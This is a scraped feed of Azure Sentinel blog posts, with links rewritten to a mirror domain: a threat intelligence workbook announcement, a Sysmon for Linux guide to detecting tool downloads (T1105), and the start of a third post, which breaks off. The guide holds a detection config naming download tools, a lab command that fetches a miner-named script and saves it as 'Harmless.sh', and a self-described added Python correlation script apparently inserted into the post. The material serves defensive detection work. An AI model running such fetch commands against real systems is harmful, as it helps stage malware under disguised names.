Azure Sentinel articles https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bg-p/AzureSentinelBlog Azure Sentinel articles Tue, 19 Oct 2021 17:44:37 GMT AzureSentinelBlog 2021-10-19T17:44:37Z What’s New: Azure Sentinel Threat Intelligence Workbook https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-threat-intelligence-workbook/ba-p/2858265 <P>Customers exploring threat intelligence indicators in their cloud workloads today face challenges understanding, aggregating, and acting on data across multiple sources. Threat intelligence is an advanced cybersecurity discipline requiring detailed knowledge of how to identify and respond to an attacker based on indicators observed in the various stages of the attack cycle. Azure Sentinel is a cloud-native SIEM solution that allows customers to import threat intelligence data from various places such as paid threat feeds, open-source feeds, and threat intelligence sharing communities. Azure Sentinel supports open standards to bring in feeds from Threat Intelligence Platforms (TIPs) over STIX &amp; TAXII. Microsoft has released the next evolution of threat hunting capabilities in the Azure Sentinel Threat Intelligence Workbook.</P> <P>&nbsp;</P> <P class="paragraph" style="vertical-align: baseline;"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="TI 18OCT21.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318165iE3D0AFA0BD5DF73C/image-size/large?v=v2&amp;px=999" role="button" title="TI 18OCT21.gif" alt="Azure Sentinel: Threat Intelligence Workbook" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure Sentinel: Threat Intelligence Workbook</span></span></P> <P>Azure Sentinel Threat Intelligence is based on the ingestion of threat indicators such as IP addresses, domains, URLs, email senders, and file hashes. 
This provides a starting point for building threat intelligence programs, which require the ability to both ingest and correlate threat data across cloud workloads. This offering provides a free-text search to hunt for IPs, hashes, emails, etc. across 50+ Microsoft telemetry components. There are advanced correlations for AI/ML, UEBA, and geospatial location of threat sources.</P> <P>&nbsp;</P> <P><LI-VIDEO vid="https://www.youtube.com/watch?v=SjEG7iVVBbI" align="center" size="large" width="600" height="338" uploading="false" thumbnail="https://i.ytimg.com/vi/SjEG7iVVBbI/hqdefault.jpg" external="url"></LI-VIDEO></P> <P>&nbsp;</P> <P><FONT size="5" color="#0000FF"><STRONG>Use Cases</STRONG></FONT></P> <P>There are several use cases for the Azure Sentinel Threat Intelligence Workbook depending on user roles and requirements. Common use cases include threat hunting, developing alerting, identifying security weaknesses, conducting assessments with custom reporting, time filtering, subscription filtering, workspace filtering, and guides. The workbook is organized into three sections:</P> <UL> <LI><STRONG>Indicators Ingestion:</STRONG> Evaluate indicators onboarded, threat feeds, and confidence ratings.</LI> <LI><STRONG>Threat Detection &amp; Hunting:</STRONG> Free-text search for indicators across your cloud workloads.</LI> <LI><STRONG>Observed Threats:</STRONG> Analyze threats by geolocation, threat group, assets targeted, and more.</LI> </UL> <P><FONT size="5" color="#0000FF"><STRONG>Benefits</STRONG></FONT></P> <UL> <LI>Ingest, analyze, and hunt for indicators within workloads</LI> <LI>Free-text search to hunt for IPs, hashes, emails, etc. across 50+ Microsoft telemetry components</LI> <LI>Advanced correlations for AI/ML, UEBA, and geospatial location of threats</LI> <LI>Find, fix, and resolve workload weaknesses</LI> <LI>Query/alert generation</LI> </UL> <P><FONT size="5" color="#0000FF"><STRONG>Visualization</STRONG></FONT></P> <UL> <LI>Dozens of visualizations, recommendations, and queries</LI> <LI>Single-click report exports</LI> </UL> <P><FONT size="5" color="#0000FF"><STRONG>Audience</STRONG></FONT></P> <UL> <LI><EM>Threat Intelligence Professionals: </EM>Investigations</LI> <LI><EM>SecOps: </EM>Alert/automation building</LI> <LI><EM>Assessors: </EM>Audit &amp; assessment</LI> <LI><EM>Security Decision Makers: </EM>Situational awareness</LI> <LI><EM>MSSP: </EM>Consultants, Managed Service Providers</LI> </UL> <P><FONT size="5" color="#0000FF"><STRONG>Getting Started</STRONG></FONT></P> <P>This content provides the capability to both ingest and correlate threat data in cloud workloads. The Threat Intelligence workbook provides a free-text search to hunt for IPs, hashes, emails, etc. across 50+ Microsoft telemetry components. 
There are advanced correlations for AI/ML, UEBA, and geospatial location of threat sources.</P> <UL> <LI>Onboard <A href="#" target="_blank" rel="noopener">Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Connect Threat Intelligence Platforms</A></LI> <LI><A href="#" target="_blank" rel="noopener">Connect STIX/TAXII Feeds</A></LI> <LI>Access the content <OL> <LI>Azure Sentinel &gt; Threat Intelligence &gt; Threat Intelligence Workbook</LI> </OL> </LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="TJBanasik_1-1634582253857.png" style="width: 731px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318163iD4C0BE6E930819E6/image-dimensions/731x375?v=v2" width="731" height="375" role="button" title="TJBanasik_1-1634582253857.png" alt="TJBanasik_1-1634582253857.png" /></span></P> <P>&nbsp;</P> <UL> <LI>&nbsp;Review the content and provide feedback through our <A href="#" target="_blank" rel="noopener">survey</A></LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="TJBanasik_2-1634582253881.png" style="width: 730px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318164iC8038DCCF1CFDE46/image-dimensions/730x327?v=v2" width="730" height="327" role="button" title="TJBanasik_2-1634582253881.png" alt="TJBanasik_2-1634582253881.png" /></span></P> <P>&nbsp;</P> <P><FONT size="5" color="#0000FF"><STRONG>Frequently Asked Questions</STRONG></FONT></P> <OL> <LI>Why is Threat Intelligence needed? <OL class="lia-list-style-type-lower-alpha"> <LI>Correlate <A href="#" target="_blank" rel="noopener">Cyber Threat Intelligence Indicators (CTI)</A> observed in your workloads</LI> </OL> </LI> <LI>What types of indicators of compromise are included? 
<OL class="lia-list-style-type-lower-alpha"> <LI><A href="#" target="_blank" rel="noopener">IP Addresses, URLs, Domains, Email Senders, File Hashes</A></LI> </OL> </LI> <LI>Is Multi-Subscription &amp; Multi-Tenant supported? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, via <A href="#" target="_blank" rel="noopener">Workbook Parameters</A> and <A href="#" target="_blank" rel="noopener">Azure Lighthouse</A></LI> </OL> </LI> <LI>Is custom reporting available? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, via guide, time, workspace, &amp; subscription parameters.</LI> </OL> </LI> <LI>Is third-party integration supported? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, via <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model (ASIM)</A> integration.</LI> </OL> </LI> <LI>Is this available in government regions? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, Azure Sentinel Threat Intelligence is <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227" target="_blank" rel="noopener">Generally Available</A> in Commercial/Government regions</LI> </OL> </LI> <LI>Can this content be exported as a report? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, via the Print Workbooks and Download Artifacts features.</LI> </OL> </LI> <LI>Is STIX/TAXII integrated? <OL class="lia-list-style-type-lower-alpha"> <LI>Yes, the content scales via <A href="#" target="_blank" rel="noopener">Connectors</A> which populate the <A href="#" target="_blank" rel="noopener">ThreatIntelligenceIndicator</A> data table.</LI> </OL> </LI> <LI>What is Dynamic Display? <OL class="lia-list-style-type-lower-alpha"> <LI>Dozens of queries are executed and only panels that return data are displayed</LI> </OL> </LI> <LI>What rights are required to use this content? 
<OL class="lia-list-style-type-lower-alpha"> <LI><A href="#" target="_blank" rel="noopener">Azure Sentinel Contributor</A> can create and edit workbooks, analytics rules, and other Azure Sentinel resources. <A href="#" target="_blank" rel="noopener">Azure Sentinel Reader</A> can view data, incidents, workbooks, and other Azure Sentinel resources.</LI> </OL> </LI> </OL> <H3><FONT size="5" color="#0000FF"><STRONG>Learn More About Threat Intelligence with Microsoft Security</STRONG></FONT></H3> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227" target="_blank" rel="noopener">General Availability of Azure Sentinel Threat Intelligence in Public and Azure Government cloud</A></LI> <LI><A href="#" target="_blank" rel="noopener">Understand threat intelligence in Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Microsoft Threat Intelligence | Unparalleled Threat Detection</A></LI> </UL> Tue, 19 Oct 2021 15:00:00 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-threat-intelligence-workbook/ba-p/2858265 TJBanasik 2021-10-19T15:00:00Z MITRE ATT&CK technique coverage with Sysmon for Linux https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/mitre-att-amp-ck-technique-coverage-with-sysmon-for-linux/ba-p/2858219 <P><EM><SPAN>Thanks to Kevin Sheldrake, Roberto Rodriguez, Jessen Kurien and Ofer Shezaf for making this blog possible.</SPAN></EM></P> <P>&nbsp;</P> <P>For many years, people have been using <A href="#" target="_blank" rel="noopener">Sysmon</A> on their Windows systems to gain clarity on what is happening on their machines and, for the security community, to highlight when suspicious or malicious activity occurs. Collecting events from individual hosts is crucial to ensuring you have the visibility needed to identify and respond to malicious events, and Sysmon provides a way to do just that. 
With the introduction of Sysmon for Linux, that same clarity is available for many Linux distros. &nbsp;While we won’t be detailing all the available Sysmon for Linux capabilities in this post, you can find the Sysmon documentation <A href="#" target="_blank" rel="noopener">here</A>, read about how to <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054" target="_blank" rel="noopener">deploy Sysmon</A> in conjunction with Azure Sentinel, look at a quick guide on how you can use <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305" target="_blank" rel="noopener">Sysmon in conjunction with Azure Sentinel</A>, or look through our GitHub repository where we’ve been experimenting with <A href="#" target="_blank" rel="noopener">Sysmon configs for Linux</A>.</P> <P>&nbsp;</P> <P>To frame the conversation around how Sysmon for Linux (shortened to Sysmon from here on out) can be used to create clarity for security teams, we will walk through how Sysmon events can be used to spot a specific MITRE ATT&amp;CK technique. The MITRE ATT&amp;CK Matrix (<A href="#" target="_self">Linux focused version here</A>) is a well-known and respected framework that many organizations use to think about adversary techniques and assess detection coverage. Just like on the Windows side, Sysmon can be used to highlight tactics and techniques across the matrix. In this blog, we will focus in on the Ingress Tool Transfer technique (<A href="#" target="_blank" rel="noopener">ID T1105</A>) and highlight a couple of the Sysmon events that can be used to see it. We observe this technique being used against Linux systems and sensor networks regularly, and while we have tools to alert on this activity, it is still a good idea to ensure you have visibility into the host so you can investigate attacks. 
To look at this technique, we will show how to enable collection of three useful events, what those events look like when they fire, and how they can help you understand what happened. Additionally, we will show what those events look like in Azure Sentinel.</P> <P>&nbsp;</P> <H2>Ingress Tool Transfer (T1105)</H2> <P>It is common to see attackers taking advantage of initial access to a machine by downloading a script or piece of malware. While “living off the land” is still something to watch for, in attacks on our customers and against our sensor network we see attempts to download tools very frequently. In fact, the MITRE ATT&amp;CK page for <A href="#" target="_blank" rel="noopener">Ingress Tool Transfer</A> shows 290 different pieces of malware and activity groups that use this technique, so it is a good place to start showing how Sysmon can help add coverage to different ATT&amp;CK techniques.</P> <P>&nbsp;</P> <P>For this example, we will focus on the five most commonly used tools for downloading scripts and malware that we’ve seen run on our sensor networks. We will look for wget, curl, ftpget, tftp, and lwp-download. You may want to customize this list for your environment, but this will cover the majority of what we see.</P> <P>&nbsp;</P> <H2>Create your Sysmon configuration file</H2> <P>Just like Sysmon for Windows, you will want to tailor your configuration files to the systems you are collecting logs from, based on the role of the system, your environment, and your collection requirements. The basics of how to write and run a configuration can be found on the <A href="#" target="_blank" rel="noopener">Sysmon documentation page</A> and you can see some examples in the <A href="#" target="_blank" rel="noopener">MSTIC-Sysmon repo</A>, so we'll just focus on what we need for this specific technique. 
One thing to note is that the Event IDs are consistent between Windows and Linux so Event ID 1 represents process creation events in both environments.</P> <P>&nbsp;</P> <P>We are interested in seeing when an attacker tries to download files to our computer. There are a few ways we can see that behavior reflected. To begin, we know that a process will have to get created to start the download. We also know that a network connection will have to be made and, if the attacker is successful, a file will be written. Lucky for us, Sysmon has us covered for all three of these with ProcessCreate, NetworkConnect, and FileCreate events.</P> <P>&nbsp;</P> <P>Below is a basic configuration that we can use to create those events based on our list of the commonly used tools (<A href="#" target="_self">it is available in our repo here</A>). You can see we have separate sections for each of the events we want and have said we want to include the listed matches.&nbsp; The tool name will be in the “Image” field, and we’ve used “end with” because we generally expect to see file paths there (ex. 
/bin/wget).</P> <P>&nbsp;</P> <LI-CODE lang="markup">&lt;!--
  Created: 10/15/2021
  Modified: 10/17/2021
  Technique: Ingress Tool Transfer
  References:
    - https://attack.mitre.org/techniques/T1105/
--&gt;
&lt;Sysmon schemaversion="4.81"&gt;
  &lt;EventFiltering&gt;
    &lt;RuleGroup name="" groupRelation="or"&gt;
      &lt;ProcessCreate onmatch="include"&gt;
        &lt;Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"&gt;
          &lt;Image condition="end with"&gt;wget&lt;/Image&gt;
          &lt;Image condition="end with"&gt;curl&lt;/Image&gt;
          &lt;Image condition="end with"&gt;ftpget&lt;/Image&gt;
          &lt;Image condition="end with"&gt;tftp&lt;/Image&gt;
          &lt;Image condition="end with"&gt;lwp-download&lt;/Image&gt;
        &lt;/Rule&gt;
      &lt;/ProcessCreate&gt;
    &lt;/RuleGroup&gt;
    &lt;RuleGroup name="" groupRelation="or"&gt;
      &lt;NetworkConnect onmatch="include"&gt;
        &lt;Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"&gt;
          &lt;Image condition="end with"&gt;wget&lt;/Image&gt;
          &lt;Image condition="end with"&gt;curl&lt;/Image&gt;
          &lt;Image condition="end with"&gt;ftpget&lt;/Image&gt;
          &lt;Image condition="end with"&gt;tftp&lt;/Image&gt;
          &lt;Image condition="end with"&gt;lwp-download&lt;/Image&gt;
        &lt;/Rule&gt;
      &lt;/NetworkConnect&gt;
    &lt;/RuleGroup&gt;
    &lt;RuleGroup name="" groupRelation="or"&gt;
      &lt;FileCreate onmatch="include"&gt;
        &lt;Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"&gt;
          &lt;Image condition="end with"&gt;wget&lt;/Image&gt;
          &lt;Image condition="end with"&gt;curl&lt;/Image&gt;
          &lt;Image condition="end with"&gt;ftpget&lt;/Image&gt;
          &lt;Image condition="end with"&gt;tftp&lt;/Image&gt;
          &lt;Image condition="end with"&gt;lwp-download&lt;/Image&gt;
        &lt;/Rule&gt;
      &lt;/FileCreate&gt;
    &lt;/RuleGroup&gt;
  &lt;/EventFiltering&gt;
&lt;/Sysmon&gt;</LI-CODE> <P>&nbsp;</P> <P>One thing to note is that both ProcessCreate and ProcessTerminate are enabled by default. If you don't want to collect one of those, you'll need 
an empty "include" statement. Once you have your configuration created and enabled, you’ll start seeing events.</P> <P>&nbsp;</P> <H2>Raw Sysmon events</H2> <P>The Sysmon logs can be found in <EM>/var/log/syslog</EM>. While you could just look at the raw events there, the SysmonLogView tool can make it easier. It takes the Sysmon events and displays them in the more human-readable format you can see below. The following command pipes new events from syslog into sysmonLogView as they arrive:</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView</LI-CODE> <P>&nbsp;</P> <P>This gives us a running view of what events are being created. We can then run the below command to trigger the rules.</P> <LI-CODE lang="bash">wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh</LI-CODE> <P>This command will use wget to call out to a server at 10.0.5.8 port 7000, download the xmrigAttackDemo.sh script, and save it as Harmless.sh. xmrigAttackDemo.sh is an internal testing script that I used for this demo.</P> <P>&nbsp;</P> <H3>ProcessCreate (Event ID 1):</H3> <P>You can see we get quite a lot of information from the ProcessCreate event. We can see wget in the Image field, the full Command Line, the Current Directory, and the user. 
You also get Parent Process information, although it isn’t as interesting in this example.</P> <P>&nbsp;</P> <LI-CODE lang="bash">Event SYSMONEVENT_CREATE_PROCESS
RuleName: -
UtcTime: 2021-09-28 21:53:22.533
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
ProcessId: 13409
Image: /usr/bin/wget
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh
CurrentDirectory: /home/testUser
User: testUser
LogonGuid: {23b1b3a6-0000-0000-e903-000000000000}
LogonId: 1001
TerminalSessionId: 38
IntegrityLevel: no level
Hashes: -
ParentProcessGuid: {23b1b3a6-8ed2-6153-0824-7cafd1550000}
ParentProcessId: 13408
ParentImage: /bin/bash
ParentCommandLine: bash</LI-CODE> <P>&nbsp;</P> <H3>NetworkConnect (Event ID 3):</H3> <P>In the NetworkConnect event, we again see wget in the Image field and the user. We also see the protocol, source and destination IP addresses, and the ports involved. Our example command line has the IP listed already so it isn’t new information, but it could be useful in tying the different logs together. You’ll notice the Process IDs also match up as expected.</P> <P>&nbsp;</P> <LI-CODE lang="bash">Event SYSM​ONEVENT_NETWORK_CONNECT
RuleName: -
UtcTime: 2021-09-28 21:53:22.543
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
ProcessId: 13409
Image: /usr/bin/wget
User: testUser
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.5.10
SourceHostname: -
SourcePort: 40680
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 10.0.5.8
DestinationHostname: -
DestinationPort: 7000
DestinationPortName: -</LI-CODE> <P>&nbsp;</P> <H3>FileCreate (Event ID 11):</H3> <P>Here we can again see the wget tool and the Process ID. 
We also have the name of the file that was created and its file path.</P> <P>&nbsp;</P> <LI-CODE lang="bash">Event SYSMONEVENT_FILE_CREATE
RuleName: -
UtcTime: 2021-09-28 21:53:22.536
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
ProcessId: 13409
Image: /usr/bin/wget
TargetFilename: /home/testUser/Harmless.sh
CreationUtcTime: 2021-09-28 21:53:22.536</LI-CODE> <P>&nbsp;</P> <H2>Viewing in Azure Sentinel</H2> <P>Sysmon events are pushed to Syslog, so if you are collecting Syslog events from your Linux machine into Azure Sentinel, you will get the Sysmon events. For more details on how to make that connection, check out the documentation <A href="#" target="_blank" rel="noopener">here</A>. Also, as the Sysmon events come through with most of the data in the Syslog Message field, you’ll need to parse out the fields you are interested in. Fortunately, the <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model</A> parsers have you covered. You can install the parsers from the link <A href="#" target="_blank" rel="noopener">here</A>. Once you do, you’ll have access to functions that take the guesswork out of parsing.</P> <P>&nbsp;</P> <P>The parsing functions are available under Functions &gt; Workspace functions. Below, you can see the Linux Sysmon functions we currently have.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_7-1634581968271.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318156i02CB0D262F777D42/image-size/medium?v=v2&amp;px=400" role="button" title="russmc_7-1634581968271.png" alt="russmc_7-1634581968271.png" /></span></P> <P>&nbsp;</P> <P>Using the function vimProcessCreateLinuxSysmon, we can see our event reflected. 
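</P> <P>Before the ASIM functions do that parsing for you, it helps to see the join itself. Below is an added example, not code from this post, from Sysmon or from the MSTIC-Sysmon repo: a small Python script that parses sysmonLogView output like the three events above and ties ProcessCreate, NetworkConnect and FileCreate together on ProcessGuid, reporting whether an Ingress Tool Transfer completed or was only attempted. The wget records are the ones shown above; the curl records (with a TEST-NET address) are constructed, and the tool list is the one from the configuration above.</P>

```python
"""Correlate Sysmon for Linux events into an Ingress Tool Transfer (T1105) chain.
Added example, not code from the post, Sysmon or the MSTIC-Sysmon repo: it parses the
'Key: value' layout sysmonLogView prints and joins the three event types on ProcessGuid."""
from __future__ import annotations

import posixpath
from dataclasses import dataclass, field

TOOLS = frozenset({"wget", "curl", "ftpget", "tftp", "lwp-download"})  # the config's "end with" list


def parse_events(text: str) -> list[dict[str, str]]:
    """One dict per record; a record starts at 'Event SYSMONEVENT_...' and owns the
    'Key: value' lines after it.  '-' is Sysmon's empty value and is dropped."""
    events: list[dict[str, str]] = []
    current: dict[str, str] | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Event "):
            current = {"EventType": line.split(maxsplit=1)[1]}
            events.append(current)
        elif current is not None and ":" in line:
            # Split on the first ':' only so 'host:port' command lines stay intact.
            key, _, value = line.partition(":")
            if value.strip() != "-":
                current[key.strip()] = value.strip()
    return events


@dataclass
class TransferChain:
    process_guid: str
    image: str = ""
    user: str = ""
    command_line: str = ""
    destinations: list[str] = field(default_factory=list)  # "ip:port"
    files: list[str] = field(default_factory=list)

    @property
    def outcome(self) -> str:
        # FileCreate: something landed on disk.  NetworkConnect only: fetch tried,
        # nothing written.  ProcessCreate only: the tool ran without a connection.
        if self.files:
            return "completed"
        return "attempted" if self.destinations else "tool-launched"


def correlate(events: list[dict[str, str]]) -> dict[str, TransferChain]:
    """Group download-tool events by ProcessGuid; other processes are skipped."""
    chains: dict[str, TransferChain] = {}
    for ev in events:
        image = ev.get("Image", "")
        # Same test as the config's "end with" rules, applied to the basename.
        if posixpath.basename(image) not in TOOLS or "ProcessGuid" not in ev:
            continue
        chain = chains.setdefault(ev["ProcessGuid"], TransferChain(ev["ProcessGuid"], image))
        kind = ev["EventType"]
        if kind == "SYSMONEVENT_CREATE_PROCESS":
            chain.user = ev.get("User", "")
            chain.command_line = ev.get("CommandLine", "")
        elif kind == "SYSMONEVENT_NETWORK_CONNECT":
            chain.destinations.append(
                f"{ev.get('DestinationIp', '?')}:{ev.get('DestinationPort', '?')}")
        elif kind == "SYSMONEVENT_FILE_CREATE":
            chain.files.append(ev.get("TargetFilename", ""))
    return chains


# Sample input: the three wget events from the post (fields not used here left out)
# plus a constructed curl attempt that opened a connection but created no file.
SAMPLE_LOG = """
Event SYSMONEVENT_CREATE_PROCESS
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
Image: /usr/bin/wget
CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh
User: testUser
Event SYSMONEVENT_NETWORK_CONNECT
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
Image: /usr/bin/wget
DestinationIp: 10.0.5.8
DestinationPort: 7000
Event SYSMONEVENT_FILE_CREATE
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
Image: /usr/bin/wget
TargetFilename: /home/testUser/Harmless.sh
Event SYSMONEVENT_CREATE_PROCESS
ProcessGuid: {00000000-constructed-0002}
Image: /usr/bin/curl
CommandLine: curl -sO http://198.51.100.7/stage2
Event SYSMONEVENT_NETWORK_CONNECT
ProcessGuid: {00000000-constructed-0002}
Image: /usr/bin/curl
DestinationIp: 198.51.100.7
DestinationPort: 80
"""

if __name__ == "__main__":
    for c in correlate(parse_events(SAMPLE_LOG)).values():
        print(f"T1105 {c.outcome}: {c.image} {c.destinations} -> {c.files}")
```

<P>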
We have narrowed the query to just the event in the example above and chosen to project only a couple of the columns of data.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_0-1634586546027.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/318176iE2954311E1950B3A/image-size/large?v=v2&amp;px=999" role="button" title="russmc_0-1634586546027.png" alt="russmc_0-1634586546027.png" /></span></P> <P>From here you can start to include Sysmon as a data source for your hunting queries and analytics.</P> <P>&nbsp;</P> <H2>Sysmon for Linux and MITRE ATT&amp;CK</H2> <P>While we didn’t dig into all the possible Sysmon events or ATT&amp;CK techniques, hopefully you can see how you can use Sysmon to collect data that will highlight adversary techniques. Sysmon is open source and available in the <A href="#" target="_blank" rel="noopener">Sysinternals GitHub</A>. If you have requests or find bugs, check out the <A href="#" target="_blank" rel="noopener">Sysmon for Linux project page</A> for the best ways to contact the team. MSTIC has been working with different configs and has started a <A href="#" target="_blank" rel="noopener">repo here</A> to share with the community. If you want to see other configs based on MITRE ATT&amp;CK techniques, check them out <A href="#" target="_blank" rel="noopener">here</A> and feel free to add suggestions of your own. If you want a config that has all the techniques we've mapped so far, you can find it <A href="#" target="_self">here</A>. We will continue to come up with new ways to utilize the logs in Azure Sentinel and we look forward to seeing what the community develops. 
If the amazing work around the Windows version is any indication, we expect that the future of Linux logging is bright.</P> <P>&nbsp;</P> <H2>References:</H2> <UL> <LI>Automating your install of Sysmon for Linux with Azure Sentinel: <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054" target="_blank" rel="noopener">Automating the deployment of Sysmon for Linux 🐧 and Azure Sentinel in a lab environment 🧪 - Microsoft Tech Community</A></LI> <LI>Quick guide to using Sysmon for Linux: <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305" target="_blank" rel="noopener">A Quick Guide on Using Sysmon for Linux in Azure Sentinel - Microsoft Tech Community</A></LI> <LI>Sysmon Documentation: <A href="#" target="_blank" rel="noopener">Sysmon - Windows Sysinternals | Microsoft Docs</A></LI> <LI>MITRE ATT&amp;CK Linux Matrix: <A href="#" target="_blank" rel="noopener">Matrix - Enterprise | MITRE ATT&amp;CK®</A></LI> <LI>Connect Syslog to Azure Sentinel: <A href="#" target="_blank" rel="noopener">Connect Syslog data to Azure Sentinel | Microsoft Docs</A></LI> <LI>Install Azure Sentinel Information Model parsers: <A href="#" target="_blank" rel="noopener">Azure-Sentinel/Parsers/ASim at master · Azure/Azure-Sentinel · GitHub</A></LI> <LI>Sysinternals GitHub: <A href="#" target="_blank" rel="noopener">Windows Sysinternals · GitHub</A></LI> <LI>Sysmon for Linux: <A href="#" target="_blank" rel="noopener">GitHub - Sysinternals/SysmonForLinux</A></LI> <LI>Sysmon for Linux Install: <A href="#" target="_blank" rel="noopener">SysmonForLinux/INSTALL.md at main · Sysinternals/SysmonForLinux · GitHub</A></LI> <LI>MSTIC-Sysmon GitHub repo: <A href="#" target="_blank" rel="noopener">GitHub - Azure/MSTIC-Sysmon: Sharing anything Sysmon (Windows and Linux) with the InfoSec community</A></LI> </UL> Mon, 18 Oct 2021 21:10:03 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/mitre-att-amp-ck-technique-coverage-with-sysmon-for-linux/ba-p/2858219 russmc 2021-10-18T21:10:03Z A Quick Guide on Using Sysmon for Linux in Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305 <P><EM>Jessen Kurien - Microsoft Threat Intelligence Center</EM></P> <P><EM>Thanks to Kevin Sheldrake, Russell McDonald, Roberto Rodriguez and Ofer Shezaf for making this blog possible.</EM></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Today, Linux is one of the fastest-growing platforms on Azure. Linux-based images form over 60% of Azure Marketplace Images. 
With Azure's support of common Linux distributions growing every day, the sophistication of cyber-attacks targeting Linux continues to grow.</SPAN></P> <P><SPAN data-contrast="auto">As part of the </SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/windows-events/sysinternals-25-a-special-anniversary-event/ev-p/2787286" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysinternals 25th anniversary</SPAN></A><SPAN data-contrast="auto">, the Sysinternals team released a new Sysmon tool supporting Linux. Sysmon for Linux is an open-source Linux system monitoring tool that provides details on process creations, network connections, and file creations and deletions, among other things. Sysmon for Linux is built on eBPF (Extended Berkeley Packet Filter), which allows in-kernel monitoring without any changes to the kernel source code.</SPAN></P> <P><SPAN data-contrast="auto">By collecting the events it generates with Azure Sentinel and then analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.</SPAN></P> <P><SPAN data-contrast="auto">Sysmon for Linux can be used to analyze pre-compromise and post-compromise activity, and when correlated with Azure Security Center (ASC)/Azure Defender (AzD) Linux detections it helps detect end-to-end attacker activity.</SPAN></P> <P><SPAN data-contrast="auto">In this blog post we will take a quick look at the different log events made available by Sysmon for Linux that defenders can use to gather more information on the alerts triggered in Azure Sentinel.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In Azure Sentinel, alerts can be viewed under Threat Management &gt; Incidents:</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_0-1634234806558.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317452i382F0782F6C0FA56/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_0-1634234806558.png" alt="jessenkurien_0-1634234806558.png" /></span></P> <P>&nbsp;</P> <P><SPAN 
